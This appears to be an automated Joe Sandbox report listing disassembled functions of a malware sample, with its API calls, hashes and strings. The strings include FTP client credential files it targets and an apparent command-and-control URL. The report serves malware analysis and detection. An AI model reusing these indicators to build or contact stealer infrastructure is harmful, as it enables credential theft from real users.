Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID:
API String ID: 2414487701-0
Opcode ID: 0c82ac4435a20b255e5fbd354940b39fe16e0e402880c5c374eda0a6726505e4
Instruction ID: 84c438033dc4a40f41ec3fb1713d9b88af673f3c4c5a25ca46e0467153808a7b
Opcode Fuzzy Hash: 0c82ac4435a20b255e5fbd354940b39fe16e0e402880c5c374eda0a6726505e4
Instruction Fuzzy Hash: C8F098B5600208BFDB116E62DC85A993AA8AF2439CF00D43AF91A59152D7BD89D48B58

Function 00401EED Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401F18

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401F4D
mEA, xrefs: 00401F31

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: AllocFolderLocalPath
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$mEA
API String ID: 1254228173-1675062997
Opcode ID: fb5f00653c6ce39eea393aa24026ca7e5ea10ad40d04fcdd616c3d7be63df805
Instruction ID: f01e1469a1e48256d8c91813024c6cb2c6aefccb03a9ae4857cb1f5866c6c2f5
Opcode Fuzzy Hash: fb5f00653c6ce39eea393aa24026ca7e5ea10ad40d04fcdd616c3d7be63df805
Instruction Fuzzy Hash: A6017176A04206FBDB10DB64CC02BDAB7B5AB84754F208177F211BA1E0D7789E51DB4D

Function 004100B6 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00403927: WSAStartup.WSOCK32(00000101,?), ref: 0040393C

Sleep.KERNEL32(00001388,00000000,00000000,?,00000000), ref: 00410174

Strings

http://oliviagurun.com/forum/viewtopic.php, xrefs: 0041010A, 00410126
Client Hash, xrefs: 00410197

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: SleepStartup
String ID: Client Hash$http://oliviagurun.com/forum/viewtopic.php
API String ID: 1372284471-235408134
Opcode ID: e8958995717bf1eff2ea884972534a3bd809841e102dc6cb9ffcb47881e45ddd
Instruction ID: d8468cc61ca98c048f1a4e6ca30fb1d031ec893d0f6b7d91a2149d879d717edf
Opcode Fuzzy Hash: e8958995717bf1eff2ea884972534a3bd809841e102dc6cb9ffcb47881e45ddd
Instruction Fuzzy Hash: 5E215172D4024AAADF11ABE1C9467FF7B74AB14349F54003BE20171191D7FE4AC9C76A

Function 004F0279 Relevance: 4.6, APIs: 3, Instructions: 69memorylibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000004,?,?,?), ref: 004F029D
VirtualProtect.KERNEL32(?,?,00000004,?,?,?), ref: 004F02BA
VirtualProtect.KERNEL32(?,?,?,?,00000004,?,?,?), ref: 004F02F3

Memory Dump Source

Source File: 00000000.00000002.2904362145.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_pbfe2Xcxue.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 2b5772553ef6244d1a72bd7c60583d678a4cff6bcfb72224e5f17730de229e31
Instruction ID: b15dc295e2eb37ad5b1cf2ee5ccf04a01804a873405b020b8ea62fbde2d33c9b
Opcode Fuzzy Hash: 2b5772553ef6244d1a72bd7c60583d678a4cff6bcfb72224e5f17730de229e31
Instruction Fuzzy Hash: 4E11E372500114AFEB314E19CC48A7BB3ACEF81B31B16415EFD19E7201D735EC0146B5

Function 0040A366 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00541FA8,Odin), ref: 0040A3B8

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

Strings

SiteInfo.QFP, xrefs: 0040A38E, 0040A3CD
Odin, xrefs: 0040A3B2

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID: Odin$SiteInfo.QFP
API String ID: 2826327444-4277389770
Opcode ID: d8722ae8e74027fbc86b0e17877e9b93c7b595e10a87bfbeaae56991114685c9
Instruction ID: 0f9fe774b469cb4c63004b76ca87e96d1914e12504fab4082dec30f0f86caec2
Opcode Fuzzy Hash: d8722ae8e74027fbc86b0e17877e9b93c7b595e10a87bfbeaae56991114685c9
Instruction Fuzzy Hash: 0A0145B1500604BAEB216771CC02FEF3E59DB81314F24413BBD40B51E2DA7C5EA192AE

Function 0040789E Relevance: 4.6, APIs: 3, Instructions: 51registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 004078B1
RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004078E5
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407948

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID:
API String ID: 4012628704-0
Opcode ID: 1684a3e24556abe0a23f1d6ae1969d8c9d86ffecdd2fe08962f1371a4863585c
Instruction ID: 36c93e17fa4935ed8e60dad1f94eeb3ebf737f654d65cb54502af1be743f887a
Opcode Fuzzy Hash: 1684a3e24556abe0a23f1d6ae1969d8c9d86ffecdd2fe08962f1371a4863585c
Instruction Fuzzy Hash: 2F11FB7280410DBADF119F90CC01BDD7BB9BF04304F1481B6B554B11A0DB79AA949F99

Function 00403003 Relevance: 4.6, APIs: 3, Instructions: 50networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 00403012
connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 0040306E
closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 00403079

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: closesocketconnectsocket
String ID:
API String ID: 643388700-0
Opcode ID: 27838496b508b28c9ce41aa7bba13d563701f725540d8031ff557b3f6c16d384
Instruction ID: 7183d0e0f00cb8bb8203b93de3d11375adc44777f8aecbb416517ddead41c510
Opcode Fuzzy Hash: 27838496b508b28c9ce41aa7bba13d563701f725540d8031ff557b3f6c16d384
Instruction Fuzzy Hash: A8019630905308AADF209FB58C86BFF766C6B01329F10863BF521751D5D7FC9A84971A

Function 0040F692 Relevance: 4.6, APIs: 3, Instructions: 50registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F6A5
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F6D9
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F733

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID:
API String ID: 1332880857-0
Opcode ID: 30ee89dff64a3956ebf5c6a1fdb0efd66acf5260903c54ef559af976e30782db
Instruction ID: 6a0bba80eceafcbcd3279f4a796fd0b4680abd76d4c8d12bb836911ea16fbd13
Opcode Fuzzy Hash: 30ee89dff64a3956ebf5c6a1fdb0efd66acf5260903c54ef559af976e30782db
Instruction Fuzzy Hash: 0D11527681010DBADF11AF90CC02FDE7779BF14308F1085B6B914B50E1DB799A95AF98

Function 0040F5F5 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F608
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F638
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F689

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID:
API String ID: 1332880857-0
Opcode ID: 4fa09c03b8c2702bb8e233395500847e9950d730bcbf4aac72ca9eca8e4fb2c1
Instruction ID: e5d5e27eb92df80b58bab79f2b31d348a1af53c7c9026c09b0652bc213c5e55c
Opcode Fuzzy Hash: 4fa09c03b8c2702bb8e233395500847e9950d730bcbf4aac72ca9eca8e4fb2c1
Instruction Fuzzy Hash: 25011E7690010CBADF21AF90CC02FDE7779BF14308F1085B6B914751A1DB7A9B95AF98

Function 0040CE32 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(?,EasyFTP), ref: 0040CE69

Part of subcall function 00402469: lstrlenA.KERNEL32(?), ref: 0040247D
Part of subcall function 00402469: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040249C
Part of subcall function 00402469: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004024AE
Part of subcall function 00402469: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004024C0

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

Strings

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040CE4B
EasyFTP, xrefs: 0040CE61

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
API String ID: 1884169789-2776585315
Opcode ID: 4b7304527d10299c074e27f95e28e7b7352d0c205cebc5a19ebe2e75c95eb3cb
Instruction ID: ab360e268f661934a92a9c7bacbc8221e93e512f64475ea8205559d83ba5745b
Opcode Fuzzy Hash: 4b7304527d10299c074e27f95e28e7b7352d0c205cebc5a19ebe2e75c95eb3cb
Instruction Fuzzy Hash: DFF090B1940208BAEF217BA1CC03F9D7E659F00748F24817B7514780F1DABD9B91A65C

Function 004038C3 Relevance: 4.5, APIs: 3, Instructions: 36COMMON

Download Yara Rule

APIs

GetHGlobalFromStream.OLE32(00000000,?), ref: 004038DF
GlobalLock.KERNEL32(?), ref: 004038F6

Part of subcall function 004036C0: InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403747

GlobalUnlock.KERNEL32(?), ref: 00403913

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Global$CrackFromInternetLockStreamUnlock
String ID:
API String ID: 1075796459-0
Opcode ID: 895562dedb02785a92424acf7e466d090eb94dad282cfa5507c4508ba70ced13
Instruction ID: 22463a1249c2eb0376aa38499e95260c1cfe8aa856205a020fab481f6bd334ac
Opcode Fuzzy Hash: 895562dedb02785a92424acf7e466d090eb94dad282cfa5507c4508ba70ced13
Instruction Fuzzy Hash: FFF04F7151020DFBDF01AFA1CC41AEE7F69AF10319F10413AB910B41B2D7B99F90EA58

Function 00408131 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00408155

Part of subcall function 00401E34: lstrlenA.KERNEL32(?), ref: 00401E55
Part of subcall function 00401E34: lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
Part of subcall function 00401E34: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
Part of subcall function 00401E34: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

Strings

\32BitFtp.ini, xrefs: 00408165

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
String ID: \32BitFtp.ini
API String ID: 2776971706-1260517637
Opcode ID: 33a1545be78869e3d7950afb86025c13f6e9ae8639ba8b3955587ae87e9031af
Instruction ID: 9602c36f730831759174d8825f7877320977bc214c771c8561c05050c13ffa35
Opcode Fuzzy Hash: 33a1545be78869e3d7950afb86025c13f6e9ae8639ba8b3955587ae87e9031af
Instruction Fuzzy Hash: 1EF082B1500208FBDB10BAA1CC43FDE76699F20748F14047BBA44B51E2EABD9B919B5C

Function 00403692 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

setsockopt.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 004036B7

Strings

-, xrefs: 0040369E

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: setsockopt
String ID: -
API String ID: 3981526788-2547889144
Opcode ID: 22746a7168d69b8109ca077f8fc10742cc71f821658c66c944c7ac124a6610b8
Instruction ID: bbd0023ac2a939cbfe046b2109bbe7e9d415700409587e3ed951090933a6a6ad
Opcode Fuzzy Hash: 22746a7168d69b8109ca077f8fc10742cc71f821658c66c944c7ac124a6610b8
Instruction Fuzzy Hash: A7D0A770550208B1D710D780CC03FDD72789F0070CF108271B710AA2E0E7F5AB58934D

Function 00401F72 Relevance: 3.0, APIs: 2, Instructions: 31fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401F9E
CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401FAC

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: d39dbdc18f269d9a0bd382627db96a0bb699d3389e345c30a75233596430591d
Instruction ID: da1f851b6ad41d0a585ef72bcc511cde3dd431a62df282b5eebc0926d26a6cdb
Opcode Fuzzy Hash: d39dbdc18f269d9a0bd382627db96a0bb699d3389e345c30a75233596430591d
Instruction Fuzzy Hash: D6E01A7239024536FB3156699C83F5A6A889711798F144132B641BE2D2D6F9ED80826C

Function 0040E824 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 0040E861

Strings

.xml, xrefs: 0040E870

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: .xml
API String ID: 1659193697-2937849440
Opcode ID: 489ffcfd401847843cefc8a62ea10b6385e71c95c027b560f80965a9363cf721
Instruction ID: 7e09cdc3a8f7f79bc3632fa6fd908551844e317328ecde9842e9c140ce417d91
Opcode Fuzzy Hash: 489ffcfd401847843cefc8a62ea10b6385e71c95c027b560f80965a9363cf721
Instruction Fuzzy Hash: 38F0D075800108FBDF11BB91DD42ACD7B76AB54318F108167F661711A1C7799B64EB48

Function 004F065F Relevance: 3.0, APIs: 2, Instructions: 23memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,004F00F0), ref: 004F066C
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000104), ref: 004F0696

Memory Dump Source

Source File: 00000000.00000002.2904362145.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_pbfe2Xcxue.jbxd

Similarity

API ID: AllocCreateFileVirtual
String ID:
API String ID: 1475775534-0
Opcode ID: 9438f341d30f8f78cd6decd17021b4ac48a7e562a6c7731b6aeff07552287e57
Instruction ID: 27e08a18c4f9120f0e09bbd93438d9f1af402ae73c7d1c31c0fe22ccc6a9f73c
Opcode Fuzzy Hash: 9438f341d30f8f78cd6decd17021b4ac48a7e562a6c7731b6aeff07552287e57
Instruction Fuzzy Hash: 3AE012B168038477FB305B208C4BFDA3924BB85F55F250104FB957D1C0C5F5A4558659

Function 00402FC9 Relevance: 3.0, APIs: 2, Instructions: 22networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(?), ref: 00402FCF
gethostbyname.WSOCK32(?,?), ref: 00402FDC

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: gethostbynameinet_addr
String ID:
API String ID: 1594361348-0
Opcode ID: 4af54c856358ab5859669df15d29a23ec61f65fca54c693a60d65231e7306ada
Instruction ID: e90bf7aad7193c0f9ceff3a40ebfa48e022e408382a647374a6f110568813f44
Opcode Fuzzy Hash: 4af54c856358ab5859669df15d29a23ec61f65fca54c693a60d65231e7306ada
Instruction Fuzzy Hash: 15E0BF312049069BCAA09A2DCD4585576A5AF163BC7104323F135DB3F5D7B8D8817749

Function 00403053 Relevance: 3.0, APIs: 2, Instructions: 16networkCOMMON

Download Yara Rule

APIs

connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 0040306E
closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 00403079

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: closesocketconnect
String ID:
API String ID: 1323028321-0
Opcode ID: 4a3d46b335ad1dc7c761c5e6745edc1ae4ad93bd71932cf7df1ea9112c5718f0
Instruction ID: 1a8dd54e177803be8ae45eb96966ffd09ab341fbcad4af9d4012cdf4e923bf73
Opcode Fuzzy Hash: 4a3d46b335ad1dc7c761c5e6745edc1ae4ad93bd71932cf7df1ea9112c5718f0
Instruction Fuzzy Hash: 77D0C971A05204A9DB109BFA5CC2ABEA65CAB1032CF104A3FB662F51C5D2BC95849629

Function 004109C5 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004109C5
ExitProcess.KERNEL32(00000000), ref: 004109E3

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CountExitProcessTick
String ID:
API String ID: 232575682-0
Opcode ID: 1fb56e7f38b998b2e1eb3b5a2befc5f99440c3229eeafce3aae42334c08131da
Instruction ID: e06f08177bb24a491aabbe78cfef0d9db75e46451ece7cabc6a11cb80e53ab46
Opcode Fuzzy Hash: 1fb56e7f38b998b2e1eb3b5a2befc5f99440c3229eeafce3aae42334c08131da
Instruction Fuzzy Hash: A2C04CF077859894F15471B215763EA100347E1708F54801FA2062519B5EEC14D1121F

Function 0040190B Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919

Strings

$@, xrefs: 0040190E, 00401916

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: $@
API String ID: 3494564517-1661285546
Opcode ID: 7c197561a88981a5446c7d804c8b2ae8a1a1457808afe291ff0403a180310e7a
Instruction ID: b47a04dfb405f7ff4a48ab368aa1ab22973e96827417dfb1fea54adad4bbf39c
Opcode Fuzzy Hash: 7c197561a88981a5446c7d804c8b2ae8a1a1457808afe291ff0403a180310e7a
Instruction Fuzzy Hash: 19B092B120030826E280A649D803F5A728C9B20B8CF008021BB44A6282C9B8F89042AD

Function 004031A5 Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

Part of subcall function 004030D3: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403118

recv.WSOCK32(?,?,00000800,00000000), ref: 004031EF

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: recvselect
String ID:
API String ID: 741273618-0
Opcode ID: 7e4c82b7df45fcab2328d309c128bb5c64b2ce6dc47c1f4668f06aa1f5c4c85a
Instruction ID: df4997655309bb799330812faf78ae7617fd6b67ef43b9658c25c6cf22e5507f
Opcode Fuzzy Hash: 7e4c82b7df45fcab2328d309c128bb5c64b2ce6dc47c1f4668f06aa1f5c4c85a
Instruction Fuzzy Hash: F2019632604209BBDB209E50CC41BAB3B9DBB18346F14457BB912E91C0D7B8DB469B89

Function 00403087 Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON

Download Yara Rule

APIs

send.WSOCK32(?,?,00000000,00000000), ref: 004030AE

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

